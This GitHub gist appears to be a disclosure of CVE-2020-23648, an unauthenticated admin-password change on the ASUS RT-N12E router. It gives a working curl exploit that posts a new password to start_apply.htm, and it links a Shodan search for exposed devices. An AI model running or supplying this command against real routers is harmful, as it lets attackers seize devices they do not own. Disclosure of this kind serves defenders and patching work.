Skip to content

Instantly share code, notes, and snippets.

@ninj4c0d3r
Last active October 19, 2022 15:16
Show Gist options
  • Save ninj4c0d3r/574d2753d469e4ba51dfe555d9c2d4fb to your computer and use it in GitHub Desktop.
Save ninj4c0d3r/574d2753d469e4ba51dfe555d9c2d4fb to your computer and use it in GitHub Desktop.
ASUS RT-N12E - Account Takeover [CVE-2020-23648]

ASUS RT-N12E - Account Takeover [CVE-2020-23648]

Descriptions

Asus RT-N12E is affected by an incorrect access control vulnerability, through system.asp/start_apply.htm an attacker can change the administrator password without any authentication.

Vulnerability

The vulnerability was exploited using the curl:

curl "http://router/start_apply.htm" --data "current_page=system.asp&typeForm=formSystemSetup&submit-url=%2
Fsystem.asp&action_mode=Restart_MISC&flag=nodetect&preferred_lang=BR&NTP_SYSTIMEZONE=GMT%2B02%3A00&newpass=NEWPASSWORD&con
fpass=NEWPASSWORD&logServer=&timeZone=-2+7&ntpServerIp=pool.ntp.org" --compressed --insecure

PoC

image

image

References

https://www.asus.com/us/SupportOnly/RT-N12E/HelpDesk_Knowledge/

https://www.shodan.io/search?query=Asus+RT-N12E

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment